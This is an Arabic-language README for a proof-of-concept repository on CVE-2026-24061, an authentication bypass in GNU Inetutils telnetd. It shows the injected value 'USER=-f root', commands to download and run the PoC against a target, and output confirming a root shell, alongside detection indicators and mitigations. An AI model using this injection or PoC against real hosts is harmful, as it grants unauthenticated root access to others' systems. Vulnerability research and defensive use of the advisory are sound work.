
# CVE-2026-24061 تجاوز المصادقة في GNU Inetutils Telnetd
CVE: CVE-2026-24061
الخطورة: حرجة
CVSS: 9.8 (حرجة)
CWE: CWE-88 — تحييد غير صحيح لمحددات الوسائط في أمر
المكوّن المتأثر: GNU Inetutils telnetd
الإصدارات المتأثرة: 1.9.3 حتى 2.7
CVE-2026-24061 هي ثغرة حرجة في تجاوز المصادقة في خادم Telnet المقدَّم من GNU Inetutils. ينشأ الثغرة من التحقق غير الكافي من متغير البيئة USER الذي يتحكم فيه العميل عند تفعيل تسجيل الدخول التلقائي في Telnet. يمكن تفسير قيمة خبيثة كخيار لبرنامج تسجيل الدخول النظامي بدلاً من تفسيرها كاسم مستخدم. في ظل التكوينات المعرضة للخطر، يمكن لمهاجم بعيد غير مصادق استغلال هذا السلوك لاستدعاء login مع الخيار -f وتجاوز المصادقة، مما قد يمنحه قشرة صلبة بصلاحيات الحساب المطلوب.
عندما تعمل خدمة Telnet المتأثرة بصلاحيات الجذر، يمكن أن يؤدي الاستغلال الناجح إلى وصول جذر عن بُعد غير مصادق.
يمكن تلخيص مسار التنفيذ المعرض للخطر على النحو التالي:
عميل Telnet
│
│ USER=-f root
▼
telnetd
│
│ يبني وسائط login
▼
login -f root
│
│ تجاوز المصادقة
▼
قشرة جذر
يتم تشغيل المشكلة من خلال التفاعل بين وظيفة تسجيل الدخول التلقائي في Telnet ومعالجة متغير البيئة USER.
القيمة التي يتحكم فيها المهاجم:
-f root
لا تُعامل بدقة كاسم مستخدم. بدلاً من ذلك، يمكن أن تصبح وسيطًا لـ login، مما ينتج عنه سلوك مكافئ لـ:
login -f root
يوجه الخيار -f برنامج login لتجاوز عملية المصادقة العادية للمستخدم المحدد.
يتضمن المستودع إثبات مفهوم بلغة Python 3 يقوم بإجراء اتصال Telnet، ويتعامل مع التفاوض البروتوكولي المطلوب، ويحقن قيمة USER الخبيثة، ويتحقق من الجلسة الناتجة.
git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
cd CVE-2026-24061-Telnetd
chmod +x poc.py
python3 poc.py <TARGET> <PORT>
wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py
اجعل إثبات المفهوم قابلاً للتنفيذ:
chmod +x poc.py
قم بتشغيله بتوفير عنوان الهدف ومنفذ Telnet:
python3 poc.py <TARGET> <PORT>
python3 poc.py 127.0.0.1 23
الاستغلال الناجح
CVE-2026-24061 - GNU Inetutils telnetd Auth Bypass
[*] الهدف: 127.0.0.1:23
[+] تم الاتصال
[*] تم حقن USER=-f root
[+] عرضة للخطر
ثم يوفر إثبات المفهوم جلسة تفاعلية.
id
uid=0(root) gid=0(root) groups=0(root)
هذا يؤكد أن آلية مصادقة Telnet تم تجاوزها وأن الجلسة الناتجة تمتلك صلاحيات الجذر.
يقوم الاستغلال بالعمليات التالية:
يتصل بخدمة Telnet المستهدفة. يقوم بالتفاوض البروتوكولي المطلوب لـ Telnet. يفعّل سلوك تسجيل الدخول التلقائي المطلوب للاستغلال. يوفر القيمة الخبيثة USER=-f root. يسمح لتطبيق telnetd المعرض للخطر بتمرير القيمة المعدلة إلى login. يستقبل الجلسة الناتجة. يوفر طرفية تفاعلية للمشغّل.
لا يعتمد إثبات المفهوم على بيانات اعتماد لمسار المصادقة المعرض للخطر.
يعتمد الاستغلال على تكوين الهدف والتفاعل بين telnetd وتطبيق login النظامي.
الشروط الأساسية هي:
GNU Inetutils telnetd ضمن نطاق الإصدارات المتأثرة.
خدمة Telnet قابلة للوصول من قبل المهاجم.
وظيفة تسجيل الدخول التلقائي مفعّلة أو متاحة.
معالجة معرضة للخطر لمتغير البيئة USER.
تطبيق login متوافق قادر على تفسير الخيار المحقون.
وبالتالي، فإن وجود إصدار Inetutils متأثر وحده لا ينبغي أن يُعتبر دليلاً على قابلية الاستغلال. يجب أيضًا مراعاة تصحيحات التوزيعات وتكوين الخدمة.
يمكن أن يؤدي CVE-2026-24061 إلى اختراق كامل لنظام معرض للخطر.
اعتمادًا على الصلاحيات التي يعمل بها telnetd، قد يوفر الاستغلال:
تجاوز المصادقة
وصول غير مصرح به لحساب محلي
تنفيذ أوامر عن بُعد
تصعيد الصلاحيات
وصول بمستوى الجذر
اختراق كامل للنظام
السيناريو الأعلى خطورة هو خدمة Telnet قابلة للوصول عن بُعد حيث يؤدي الاستغلال إلى جلسة جذر.
تشمل المؤشرات المحتملة للاستغلال:
اتصالات غير متوقعة على TCP/23.
محاولات مصادقة Telnet باستخدام أسماء مستخدمين غير معتادة.
قيم USER مشبوهة تبدأ بخيارات سطر أوامر.
وسائط غير متوقعة لعملية login.
جلسات جذر تنشأ من telnetd.
عمليات غير متوقعة يتم إطلاقها بواسطة خدمة Telnet.
يجب أن تحدد مراقبة الشبكة أيضًا الأنظمة التي تعرض خدمات Telnet بشكل غير ضروري.
الاستجابة الموصى بها هي إزالة Telnet واستخدام SSH للإدارة عن بُعد.
إذا تعذر إزالة Telnet فورًا:
قم بالترقية إلى إصدار مقدَّم من المورّد يحتوي على الإصلاح الأمني.
قم بتطبيق تحديث الأمان المناسب لنظام التشغيل.
قم بتقييد TCP/23 على شبكات الإدارة الموثوقة.
امنع التعرض المباشر لـ Telnet للشبكات غير الموثوقة.
راقب مصادقة Telnet ونشاط العمليات.
نظرًا لأن توزيعات Linux قد تعيد تطبيق الإصلاحات الأمنية دون تغيير رقم الإصدار العلوي، يجب على المسؤولين التحقق من الحالة الأمنية لحزمة التوزيع الخاصة بهم بدلاً من الاعتماد فقط على الإصدار المعروض.
تم إعادة إنتاج الثغرة بنجاح ضد خدمة GNU Inetutils Telnet معرضة للخطر تعمل على Ubuntu 22.04.5 LTS.
أنشأ إثبات المفهوم اتصالاً بـ TCP/23، وحقن:
USER=-f root
وحصل على جلسة جذر.
أعاد التحقق من الصلاحيات:
uid=0(root) gid=0(root) groups=0(root)
هذا يوفر تأكيدًا مباشرًا للتأثير الأمني.
تم توفير إثبات المفهوم هذا لأغراض البحث الأمني، والتحقق من الثغرات، واختبار الاختراق المصرح به، والأغراض التعليمية.
اختبر فقط الأنظمة التي لديك إذن صريح لها.
Gabriel D. Ishengoma
الأمن الهجومي · البحث في الأمن السيبراني · التحليل الجنائي الرقمي